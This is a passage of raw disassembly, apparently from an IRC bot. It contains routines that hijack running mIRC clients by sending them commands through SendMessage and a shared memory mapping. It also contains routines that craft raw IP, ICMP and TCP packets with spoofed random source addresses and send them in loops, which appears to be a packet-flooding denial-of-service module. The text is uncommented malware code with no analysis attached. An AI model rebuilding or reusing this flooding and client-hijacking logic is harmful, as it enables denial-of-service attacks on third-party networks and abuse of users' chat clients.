fild dword ptr [ebp+var_18+4]
fmul [ebp+var_10]
fmul dbl_437388
call sub_42A9E0
mov al, byte ptr aAbcdefghijkl_0[eax] ; "abcdefghijklmnopqrstuvwxyz1234567890-|`"...
mov [ebp+esi+var_2C], al
jmp short loc_426A51
; ---------------------------------------------------------------------------
loc_426A33: ; CODE XREF: sub_426761+297�j
call sub_429B9C
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_437378
call sub_42A9E0
mov cl, 41h
sub cl, al
mov [ebp+esi+var_2C], cl
loc_426A51: ; CODE XREF: sub_426761+2D0�j
inc esi
mov [ebp+var_4], esi
loc_426A55: ; CODE XREF: sub_426761+1D0�j
; sub_426761+1FF�j ...
cmp esi, 6
jge short loc_426AD5
call sub_429B9C
cmp esi, 5
jge short loc_426A72
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_437390
jmp short loc_426A8B
; ---------------------------------------------------------------------------
loc_426A72: ; CODE XREF: sub_426761+301�j
push 8
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
pop eax
sub eax, esi
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul dbl_437388
loc_426A8B: ; CODE XREF: sub_426761+30F�j
call sub_42A9E0
test eax, eax
jnz short loc_426AAE
call sub_429B9C
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_437368
call sub_42A9E0
mov cl, 30h
jmp short loc_426ACB
; ---------------------------------------------------------------------------
loc_426AAE: ; CODE XREF: sub_426761+331�j
cmp eax, 1
jnz short loc_426AD5
call sub_429B9C
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_437378
call sub_42A9E0
mov cl, 41h
loc_426ACB: ; CODE XREF: sub_426761+34B�j
sub cl, al
mov [ebp+esi+var_2C], cl
inc esi
mov [ebp+var_4], esi
loc_426AD5: ; CODE XREF: sub_426761+2F7�j
; sub_426761+350�j
cmp ebx, 2
jge short loc_426B53
call sub_429B9C
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fimul [ebp+var_4]
fmul dbl_437388
call sub_42A9E0
cmp eax, 1
jnz short loc_426B53
call sub_429B9C
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_437368
call sub_42A9E0
mov cl, 30h
sub cl, al
mov [ebp+esi+var_2C], cl
call sub_429B9C
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_437360
call sub_42A9E0
cmp eax, 1
jnz short loc_426B53
cmp ebx, eax
jge short loc_426B53
call sub_429B9C
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_437358
call sub_42A9E0
mov cl, 30h
sub cl, al
mov [ebp+esi+var_2B], cl
loc_426B53: ; CODE XREF: sub_426761+1B8�j
; sub_426761+377�j ...
lea eax, [ebp+var_2C]
push 14h
push eax
push [ebp+arg_0]
call sub_429D10
mov eax, [ebp+arg_0]
add esp, 0Ch
pop edi
pop esi
pop ebx
leave
retn
sub_426761 endp
; =============== S U B R O U T I N E =======================================
sub_426B6C proc near ; CODE XREF: sub_40A9FE+4620�p
push esi
mov esi, offset dword_6608CC
loc_426B72: ; CODE XREF: sub_426B6C+2D�j
cmp dword ptr [esi-4], 1
jnz short loc_426B85
mov eax, [esi]
test eax, eax
jbe short loc_426B85
push eax
call dword_456FF0 ; closesocket
loc_426B85: ; CODE XREF: sub_426B6C+A�j
; sub_426B6C+10�j
push dword ptr [esi]
call dword_4372D8 ; closesocket
add esi, 410h
cmp esi, offset dword_66D3EC
jl short loc_426B72
xor eax, eax
pop esi
retn
sub_426B6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426B9F proc near ; DATA XREF: sub_426CEB+B�o
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 204h
push esi
lea eax, [ebp+var_204]
push 200h
push eax
push [ebp+arg_0]
call dword_437270 ; GetClassNameA
mov esi, offset aMirc ; "mIRC"
lea eax, [ebp+var_204]
push esi
push eax
call sub_42A8C0
pop ecx
test eax, eax
pop ecx
jnz short loc_426C3D
push ebx
push esi
xor esi, esi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call dword_4370C8 ; CreateFileMappingA
push esi
push esi
mov ebx, eax
push esi
push 0F001Fh
push ebx
call dword_437040 ; MapViewOfFile
push [ebp+arg_4]
mov [ebp+var_4], eax
push offset aS_5 ; "%s"
push eax
call dword_437278 ; wsprintfA
add esp, 0Ch
push esi
push 1
push 4C8h
push [ebp+arg_0]
call dword_437274 ; SendMessageA
push [ebp+var_4]
call dword_437048 ; UnmapViewOfFile
push ebx
call dword_437044 ; CloseHandle
mov dword_6607E8, 1
pop ebx
loc_426C3D: ; CODE XREF: sub_426B9F+35�j
xor eax, eax
pop esi
inc eax
leave
retn 8
sub_426B9F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426C45 proc near ; DATA XREF: sub_426CEB+1A�o
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 204h
push esi
lea eax, [ebp+var_204]
push 200h
push eax
push [ebp+arg_0]
call dword_437270 ; GetClassNameA
mov esi, offset aMirc32 ; "mIRC32"
lea eax, [ebp+var_204]
push esi
push eax
call sub_42A8C0
pop ecx
test eax, eax
pop ecx
jnz short loc_426CE3
push ebx
push esi
xor esi, esi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call dword_4370C8 ; CreateFileMappingA
push esi
push esi
mov ebx, eax
push esi
push 0F001Fh
push ebx
call dword_437040 ; MapViewOfFile
push [ebp+arg_4]
mov [ebp+var_4], eax
push offset aS_5 ; "%s"
push eax
call dword_437278 ; wsprintfA
add esp, 0Ch
push esi
push 1
push 4C8h
push [ebp+arg_0]
call dword_437274 ; SendMessageA
push [ebp+var_4]
call dword_437048 ; UnmapViewOfFile
push ebx
call dword_437044 ; CloseHandle
mov dword_6607E8, 1
pop ebx
loc_426CE3: ; CODE XREF: sub_426C45+35�j
xor eax, eax
pop esi
inc eax
leave
retn 8
sub_426C45 endp
; =============== S U B R O U T I N E =======================================
sub_426CEB proc near ; CODE XREF: sub_40A9FE+27D8�p
arg_0 = dword ptr 4
push [esp+arg_0]
and dword_6607E8, 0
push offset sub_426B9F
call dword_456FEC ; EnumWindows
push [esp+arg_0]
push offset sub_426C45
call dword_456FEC ; EnumWindows
mov eax, dword_6607E8
retn
sub_426CEB endp
; ---------------------------------------------------------------------------
loc_426D16: ; CODE XREF: .text:00436663�j
; .text:0043666B�j ...
mov eax, [ecx]
test eax, eax
jz short locret_426D22
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
locret_426D22: ; CODE XREF: .text:00426D1A�j
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426D23 proc near ; CODE XREF: sub_42757B+8A�p
var_100 = byte ptr -100h
push ebp
mov ebp, esp
sub esp, 100h
push esi
lea eax, [ebp+var_100]
push 100h
push eax
call dword_4372E0 ; gethostname
lea eax, [ebp+var_100]
push eax
call dword_4372A4 ; gethostbyname
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
and esi, 0FFFFFFh
call sub_429B9C
cdq
mov ecx, 0FFh
idiv ecx
mov eax, edx
shl eax, 18h
or eax, esi
pop esi
leave
retn
sub_426D23 endp
; =============== S U B R O U T I N E =======================================
sub_426D70 proc near ; CODE XREF: sub_42757B+5F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_8]
push edi
push 10h
push 0
push esi
call sub_429760
add esp, 0Ch
mov word ptr [esi], 2
push [esp+8+arg_0]
call dword_4372C0 ; inet_addr
lea edi, [esi+4]
cmp eax, 0FFFFFFFFh
mov [edi], eax
jnz short loc_426DC4
push [esp+8+arg_0]
call dword_4372A4 ; gethostbyname
test eax, eax
jz short loc_426DD2
mov cx, [eax+8]
mov [esi], cx
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx
push dword ptr [eax]
push edi
call sub_429420
add esp, 0Ch
loc_426DC4: ; CODE XREF: sub_426D70+2A�j
push [esp+8+arg_4]
call dword_4372C4 ; ntohs
mov [esi+2], ax
loc_426DD2: ; CODE XREF: sub_426D70+38�j
xor eax, eax
pop edi
inc eax
pop esi
retn
sub_426D70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426DD8 proc near ; CODE XREF: sub_4273E5+109�p
; sub_4273E5+14D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_4]
mov edx, [ebp+arg_0]
push esi
xor esi, esi
cmp ecx, 1
mov [ebp+var_4], esi
jle short loc_426E07
lea eax, [ecx-2]
push edi
shr eax, 1
inc eax
lea edi, [eax+eax]
sub ecx, edi
loc_426DF9: ; CODE XREF: sub_426DD8+29�j
movzx edi, word ptr [edx]
add esi, edi
inc edx
inc edx
dec eax
jnz short loc_426DF9
pop edi
cmp ecx, 1
loc_426E07: ; CODE XREF: sub_426DD8+13�j
jnz short loc_426E14
mov al, [edx]
mov byte ptr [ebp+var_4], al
movzx eax, word ptr [ebp+var_4]
add esi, eax
loc_426E14: ; CODE XREF: sub_426DD8:loc_426E07�j
mov ecx, esi
and esi, 0FFFFh
sar ecx, 20h
add ecx, esi
pop esi
mov eax, ecx
sar eax, 20h
add eax, ecx
not eax
leave
retn
sub_426DD8 endp
; =============== S U B R O U T I N E =======================================
sub_426E2D proc near ; CODE XREF: sub_42757B+94�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ecx
push ebx
push ebp
push esi
push edi
call sub_429B9C
cdq
mov ecx, 9C40h
mov ebp, 5DCh
idiv ecx
push ebp
push 1
add edx, 1F4h
mov [esp+1Ch+var_4], edx
call sub_42B39A
mov ebx, dword_4372C4
pop ecx
pop ecx
mov esi, eax
push ebp
or byte ptr [esi+14h], 0FFh
lea edi, [esi+20h]
mov byte ptr [esi], 4
mov byte ptr [esi+0Ch], 8
call ebx ; dword_4372C4
push [esp+14h+var_4]
mov [esi+4], ax
mov byte ptr [esi+15h], 2
call ebx ; dword_4372C4
push 2000h
mov [esi+8], ax
call ebx ; dword_4372C4
mov [esi+0Eh], ax
mov eax, [esp+14h+arg_4]
mov [esi+18h], eax
mov eax, [esp+14h+arg_0]
push 20h
push esi
mov eax, [eax+4]
mov [esi+1Ch], eax
call sub_41E3E8
push 10h
mov [esi+16h], ax
and byte ptr [edi], 0
and dword ptr [edi+4], 0
push edi
call sub_41E3E8
add esp, 10h
mov [edi+2], ax
push 31h
pop edi
loc_426EC4: ; CODE XREF: sub_426E2D+AA�j
call sub_429B9C
cdq
mov ecx, 0DCh
idiv ecx
mov [edi+esi], dl
inc edi
cmp edi, ebp
jl short loc_426EC4
push 0FFh
push 3
push 2
call dword_4372BC ; socket
test eax, eax
mov [esp+14h+arg_4], eax
jl short loc_426F59
push 10h
push [esp+18h+arg_0]
push 0
push ebp
push esi
push eax
call dword_437294 ; sendto
cmp eax, 0FFFFFFFFh
jnz short loc_426F0A
xor eax, eax
jmp short loc_426F5C
; ---------------------------------------------------------------------------
loc_426F0A: ; CODE XREF: sub_426E2D+D7�j
mov edi, 5C8h
loc_426F0F: ; CODE XREF: sub_426E2D+119�j
mov eax, edi
sar eax, 3
cmp edi, 1158h
jg short loc_426F1F
or ah, 20h
loc_426F1F: ; CODE XREF: sub_426E2D+ED�j
push eax
call ebx ; dword_4372C4
push 10h
mov [esi+0Eh], ax
push [esp+18h+arg_0]
push 0
push ebp
push esi
push [esp+28h+arg_4]
call dword_437294 ; sendto
add edi, 5C8h
cmp edi, 1CE8h
jl short loc_426F0F
push esi
call sub_4298F2
pop ecx
push [esp+14h+arg_4]
call dword_4372D8 ; closesocket
loc_426F59: ; CODE XREF: sub_426E2D+C1�j
xor eax, eax
inc eax
loc_426F5C: ; CODE XREF: sub_426E2D+DB�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_426E2D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426F62 proc near ; CODE XREF: sub_426FB8+1EF�p
; sub_426FB8+249�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
xor edx, edx
push esi
mov esi, [ebp+arg_0]
cmp ecx, 1
mov [ebp+arg_4], edx
jle short loc_426F8F
lea eax, [ecx-2]
push edi
shr eax, 1
inc eax
lea edi, [eax+eax]
sub ecx, edi
loc_426F82: ; CODE XREF: sub_426F62+27�j
movzx edi, si
add edx, edi
inc esi
dec eax
jnz short loc_426F82
pop edi
cmp ecx, 1
loc_426F8F: ; CODE XREF: sub_426F62+12�j
jnz short loc_426F9F
movzx eax, si
mov al, [eax]
mov byte ptr [ebp+arg_4], al
movzx eax, word ptr [ebp+arg_4]
add edx, eax
loc_426F9F: ; CODE XREF: sub_426F62:loc_426F8F�j
mov ecx, edx
and edx, 0FFFFh
sar ecx, 20h
add ecx, edx
pop esi
mov eax, ecx
sar eax, 20h
add eax, ecx
not eax
pop ebp
retn
sub_426F62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426FB8 proc near ; CODE XREF: sub_42757B+173�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push edi
xor ebx, ebx
mov esi, 2000h
xor eax, eax
lea edi, [ebp+var_C]
mov [ebp+var_30], ebx
mov [ebp+var_2C], ebx
mov [ebp+var_28], ebx
mov [ebp+var_24], esi
mov [ebp+var_20], 800h
mov [ebp+var_1C], 80h
mov [ebp+var_18], 1000h
mov [ebp+var_14], 1
mov [ebp+var_10], ebx
stosd
mov [ebp+var_4], ebx
call sub_429B9C
push 100h
push [ebp+arg_14]
call dword_4372E0 ; gethostname
push [ebp+arg_14]
call dword_4372A4 ; gethostbyname
mov eax, [eax+0Ch]
mov eax, [eax]
mov edi, [eax]
and edi, 0FFFFFFh
call sub_429B9C
cdq
mov ecx, 0FFh
idiv ecx
shl edx, 18h
or edi, edx
call sub_429B9C
cdq
idiv esi
mov al, byte_675F54
and al, 0E5h
or al, 5
mov byte_675F54, al
mov [ebp+var_8], edx
call sub_429B9C
push 0Ah
mov esi, dword_4372C4
cdq
pop ecx
idiv ecx
mov ax, word ptr [ebp+edx*4+var_30]
push eax
call esi ; dword_4372C4
push ebx
mov word_675F56, ax
call esi ; dword_4372C4
push ebx
mov word_675F68, ax
call esi ; dword_4372C4
push 5Ch
mov word_675F6A, ax
mov byte_675F48, 14h
mov byte ptr word_675F4A, bl
call esi ; dword_4372C4
mov word_675F4C, ax
call sub_429B9C
cdq
mov ecx, 0ED60h
idiv ecx
add edx, 396h
push edx
call esi ; dword_4372C4
mov word_675F50, ax
mov eax, [ebp+arg_4]
mov byte_675F5C, 80h
mov byte_675F5D, 6
mov word_675F5E, bx
mov dword_675F60, edi
mov dword_675F64, eax
call sub_429B9C
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call esi ; dword_4372C4
push [ebp+arg_18]
mov word_675F6C, ax
call esi ; dword_4372C4
push 20000000h
mov word_675F6E, ax
call dword_4372E4 ; ntohl
mov dword_675F70, eax
mov eax, dword_675F7C
and al, 5Fh
mov dword_675F74, ebx
or al, 50h
mov byte_675FA2, bl
mov dword_675F7C, eax
call sub_429B9C
push 3
cdq
pop ecx
idiv ecx
mov dword_675F78, edx
call sub_429B9C
push 2
mov word_675F94, 4000h
cdq
pop ecx
mov word_675F90, bx
idiv ecx
mov word_675F96, bx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov byte_675F80, dl
call sub_429B9C
mov edi, eax
shl edi, 10h
call sub_429B9C
or edi, eax
push edi
call esi ; dword_4372C4
movzx eax, ax
mov edi, offset dword_6737D0
push 68h
push ebx
push edi
mov dword_675F70, eax
call sub_429760
mov ebx, offset byte_675F48
push 10h
push ebx
push edi
call sub_429420
mov eax, edi
push 10h
push eax
call sub_426F62
push 8
push offset dword_675F60
push edi
mov word_675F4A, ax
call sub_429420
push 1
push offset byte_675F5D
push offset byte_6737D9
call sub_429420
add esp, 38h
push 38h
call esi ; dword_4372C4
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push 2
push eax
push offset word_6737DA
call sub_429420
mov eax, offset dword_6737DC
push 38h
push offset word_675F6C
mov esi, eax
push eax
call sub_429420
push 44h
push esi
call sub_426F62
add esp, 20h
mov word_675F96, ax
lea eax, [ebp+arg_0]
push 10h
push eax
push 1
push 5Ch
push ebx
push [ebp+arg_10]
call dword_437294 ; sendto
xor eax, eax
pop edi
pop esi
inc eax
pop ebx
leave
retn
sub_426FB8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42722B proc near ; CODE XREF: sub_42757B+85�p
var_210 = byte ptr -210h
var_80 = byte ptr -80h
var_7F = byte ptr -7Fh
var_64 = byte ptr -64h
var_54 = byte ptr -54h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
mov esi, dword_4372C0
push edi
push [ebp+arg_0]
call esi ; dword_4372C0
push [ebp+arg_4]
mov [ebp+var_30], eax
call esi ; dword_4372C0
push 0Eh
mov [ebp+arg_4], eax
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_7F]
mov [ebp+var_80], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_210]
push eax
push 202h
call dword_4372B8 ; WSAStartup
test eax, eax
jnz short loc_427292
xor esi, esi
inc esi
push esi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_4372C8 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_427299
loc_427292: ; CODE XREF: sub_42722B+48�j
xor eax, eax
jmp loc_4273E0
; ---------------------------------------------------------------------------
loc_427299: ; CODE XREF: sub_42722B+65�j
lea ecx, [ebp+var_34]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_34], esi
call dword_43728C ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_4273D5
push 10h
lea eax, [ebp+var_44]
push ebx
push eax
call sub_429760
add esp, 0Ch
mov [ebp+var_44], 2
call sub_429B9C
mov esi, dword_4372C4
push eax
call esi ; dword_4372C4
mov edi, [ebp+var_30]
push 2Ch
mov [ebp+var_42], ax
mov [ebp+var_40], edi
mov [ebp+var_2C], 47h
call esi ; dword_4372C4
push ebx
mov [ebp+var_2A], ax
call esi ; dword_4372C4
mov [ebp+var_28], ax
mov eax, [ebp+arg_4]
push ebx
mov [ebp+var_26], bx
mov [ebp+var_24], 80h
mov [ebp+var_23], 2
mov [ebp+var_22], bx
mov [ebp+var_2B], bl
mov [ebp+var_1C], edi
mov [ebp+var_20], eax
call esi ; dword_4372C4
push ebx
mov [ebp+var_18], ax
call esi ; dword_4372C4
push 1
mov [ebp+var_16], ax
mov [ebp+var_10], 11h
mov [ebp+var_F], 5
call esi ; dword_4372C4
push offset a0_0_0_0 ; "0.0.0.0"
mov [ebp+var_6], ax
mov [ebp+var_8], bl
mov [ebp+var_7], bl
call dword_4372C0 ; inet_addr
push 10h
mov [ebp+var_C], eax
pop esi
lea eax, [ebp+var_10]
push esi
push eax
lea eax, [ebp+var_80]
mov [ebp+var_4], edi
push eax
mov [ebp+var_E], bx
call sub_429420
lea eax, [ebp+var_80]
push esi
push eax
call sub_41E3E8
mov [ebp+var_E], ax
lea eax, [ebp+var_2C]
push 1Ch
push eax
lea eax, [ebp+var_80]
push eax
call sub_429420
lea eax, [ebp+var_10]
push esi
push eax
lea eax, [ebp+var_64]
push eax
call sub_429420
push 4
lea eax, [ebp+var_54]
push ebx
push eax
call sub_429760
lea eax, [ebp+var_80]
push 2Ch
push eax
call sub_41E3E8
add esp, 40h
push eax
call dword_4372A8 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_2C]
push 1Ch
push eax
lea eax, [ebp+var_80]
push eax
call sub_429420
add esp, 0Ch
lea eax, [ebp+var_44]
push esi
push eax
push ebx
lea eax, [ebp+var_80]
push 2Ch
push eax
push [ebp+arg_0]
call dword_437294 ; sendto
xor ebx, ebx
inc ebx
loc_4273D5: ; CODE XREF: sub_42722B+84�j
push [ebp+arg_0]
call dword_4372D8 ; closesocket
mov eax, ebx
loc_4273E0: ; CODE XREF: sub_42722B+69�j
pop edi
pop esi
pop ebx
leave
retn
sub_42722B endp
; =============== S U B R O U T I N E =======================================
sub_4273E5 proc near ; CODE XREF: sub_42757B+AB�p
var_194 = dword ptr -194h
var_190 = byte ptr -190h
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 194h
lea eax, [esp+194h+var_190]
push ebx
push ebp
push esi
push edi
push eax
push 202h
call dword_4372B8 ; WSAStartup
test eax, eax
jnz loc_427558
call sub_429B9C
push 38h
push 1
call sub_42B39A
pop ecx
xor edi, edi
pop ecx
mov esi, eax
push 1
push edi
push edi
push 2
push 3
push 2
call dword_4372C8 ; WSASocketA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [esp+1A4h+var_194], ebx
jz loc_427558
push 38h
push edi
push esi
call sub_429760
mov edi, dword_4372C4
add esp, 0Ch
mov byte ptr [esi+0Ch], 5
mov byte ptr [esi], 4
push 7A69h
call edi ; dword_4372C4
push 2000h
mov [esi+8], ax
call edi ; dword_4372C4
mov ebp, [esp+1A4h+arg_8]
and byte ptr [esi+15h], 0
mov [esi+0Eh], ax
mov eax, [esp+1A4h+arg_4]
push 10h
push ebp
push 0
mov byte ptr [esi+14h], 80h
mov [esi+18h], eax
mov eax, [ebp+4]
push 31h
push esi
push ebx
mov ebx, dword_437294
mov [esi+1Ch], eax
and byte ptr [esi+21h], 0
mov byte ptr [esi+20h], 8
call ebx ; dword_437294
cmp eax, 0FFFFFFFFh
jz loc_427558
push 38h
call edi ; dword_4372C4
push 1
mov [esi+4], ax
call edi ; dword_4372C4
push 21D9h
mov [esi+0Eh], ax
mov byte ptr [esi], 4
call edi ; dword_4372C4
push 2000h
mov [esi+8], ax
call edi ; dword_4372C4
or [esi+0Eh], ax
mov eax, [esp+1A4h+arg_4]
or byte ptr [esi+14h], 0FFh
and byte ptr [esi+15h], 0
mov [esi+18h], eax
mov eax, [ebp+4]
push 10h
push esi
mov [esi+1Ch], eax
call sub_426DD8
pop ecx
mov [esi+16h], ax
pop ecx
and byte ptr [esi+21h], 0
push 10h
push ebp
push 0
push 31h
push esi
mov byte ptr [esi+20h], 8
push [esp+1B8h+var_194]
call ebx ; dword_437294
cmp eax, 0FFFFFFFFh
jz short loc_427558
push 38h
call edi ; dword_4372C4
push 1
mov [esi+4], ax
call edi ; dword_4372C4
push 2000h
mov [esi+0Eh], ax
call edi ; dword_4372C4
or [esi+0Eh], ax
push 20h
push esi
call sub_426DD8
pop ecx
mov [esi+16h], ax
pop ecx
and byte ptr [esi+20h], 0
and byte ptr [esi+21h], 0
push 10h
push ebp
push 0
push 34h
push esi
push [esp+1B8h+var_194]
call ebx ; dword_437294
cmp eax, 0FFFFFFFFh
jnz short loc_42755C
loc_427558: ; CODE XREF: sub_4273E5+1C�j
; sub_4273E5+4F�j ...
xor eax, eax
jmp short loc_427570
; ---------------------------------------------------------------------------
loc_42755C: ; CODE XREF: sub_4273E5+171�j
push esi
call sub_4298F2
pop ecx
push [esp+1A4h+var_194]
call dword_4372D8 ; closesocket
xor eax, eax
inc eax
loc_427570: ; CODE XREF: sub_4273E5+175�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 194h
retn
sub_4273E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42757B proc near ; DATA XREF: sub_40A9FE+7DD1�o
var_14C = dword ptr -14Ch
var_148 = byte ptr -148h
var_C8 = byte ptr -0C8h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 48h
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
rep movsd
mov dword ptr [eax+11Ch], 1
mov eax, [ebp+var_14C]
mov [ebp+var_8], eax
lea eax, [ebp+var_148]
push eax
call sub_41E3EC
mov esi, dword_4372BC
pop ecx
mov edi, 0FFh
push edi
push 3
push 2
call esi ; dword_4372BC
mov [ebp+var_4], eax
lea eax, [ebp+var_2C]
push eax
xor ebx, ebx
lea eax, [ebp+var_148]
push ebx
push eax
call sub_426D70
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_427776
cmp [ebp+var_44], ebx
mov [ebp+arg_0], ebx
jl short loc_427641
mov ebx, offset dword_457CF8
loc_4275F8: ; CODE XREF: sub_42757B+C4�j
lea eax, [ebp+var_148]
push ebx
push eax
call sub_42722B
call sub_426D23
push eax
lea eax, [ebp+var_2C]
push eax
call sub_426E2D
add esp, 10h
lea eax, [ebp+var_2C]
push eax
push ebx
call sub_41E3EC
pop ecx
push eax
push [ebp+var_4]
call sub_4273E5
add esp, 0Ch
push 0Ah
call dword_437190 ; Sleep
inc [ebp+arg_0]
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_44]
jle short loc_4275F8
loc_427641: ; CODE XREF: sub_42757B+76�j
and [ebp+arg_0], 0
lea eax, [ebp+var_148]
push eax
call sub_41E3EC
mov ebx, eax
pop ecx
cmp ebx, 0FFFFFFFFh
jz loc_427776
push 10h
lea eax, [ebp+var_1C]
push 0
push eax
call sub_429760
add esp, 0Ch
mov [ebp+var_1C], 2
mov [ebp+var_18], ebx
push [ebp+var_48]
call dword_4372C4 ; ntohs
push 6
push 1
push 2
mov [ebp+var_1A], ax
call esi ; dword_4372BC
test eax, eax
mov [ebp+var_4], eax
jl loc_427776
push edi
push 3
push 2
call esi ; dword_4372BC
test eax, eax
mov [ebp+var_C], eax
jl loc_427776
lea eax, [ebp+var_1C]
push 10h
push eax
push [ebp+var_4]
call dword_4372CC ; connect
mov ebx, dword_4372D8
cmp eax, 0FFFFFFFFh
jnz short loc_4276C7
push [ebp+var_4]
call ebx ; dword_4372D8
loc_4276C7: ; CODE XREF: sub_42757B+145�j
push 3
call dword_437190 ; Sleep
cmp [ebp+var_44], 0
jz short loc_427709
loc_4276D5: ; CODE XREF: sub_42757B+18C�j
push [ebp+var_48]
lea eax, [ebp+var_148]
lea esi, [ebp+var_1C]
push eax
push [ebp+var_C]
sub esp, 10h
mov edi, esp
movsd
movsd
movsd
movsd
call sub_426FB8
add esp, 1Ch
push 0Ah
call dword_437190 ; Sleep
inc [ebp+arg_0]
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_44]
jnz short loc_4276D5
loc_427709: ; CODE XREF: sub_42757B+158�j
push [ebp+var_4]
call ebx ; dword_4372D8
push [ebp+var_3C]
call sub_423623
cmp [ebp+var_34], 0
pop ecx
mov ebx, offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
mov edi, offset aSsoce0jbtxi ; "sSOce0JbTXI/"
mov esi, offset aSSSWithDPackS ; "%s %s (%s) with (%d) pack(s)"
jnz short loc_427751
cmp [ebp+var_38], 0
jnz short loc_427757
push [ebp+var_44]
lea eax, [ebp+var_148]
push eax
push ebx
push edi
lea eax, [ebp+var_C8]
push esi
push eax
push [ebp+var_8]
call sub_41CE4A
add esp, 1Ch
loc_427751: ; CODE XREF: sub_42757B+1AF�j
cmp [ebp+var_38], 0
jz short loc_427776
loc_427757: ; CODE XREF: sub_42757B+1B5�j
push [ebp+var_44]
lea eax, [ebp+var_148]
push eax
push ebx
push edi
lea eax, [ebp+var_C8]
push esi
push eax
push [ebp+var_8]
call sub_41CDD4
add esp, 1Ch
loc_427776: ; CODE XREF: sub_42757B+6A�j
; sub_42757B+DC�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_42757B endp
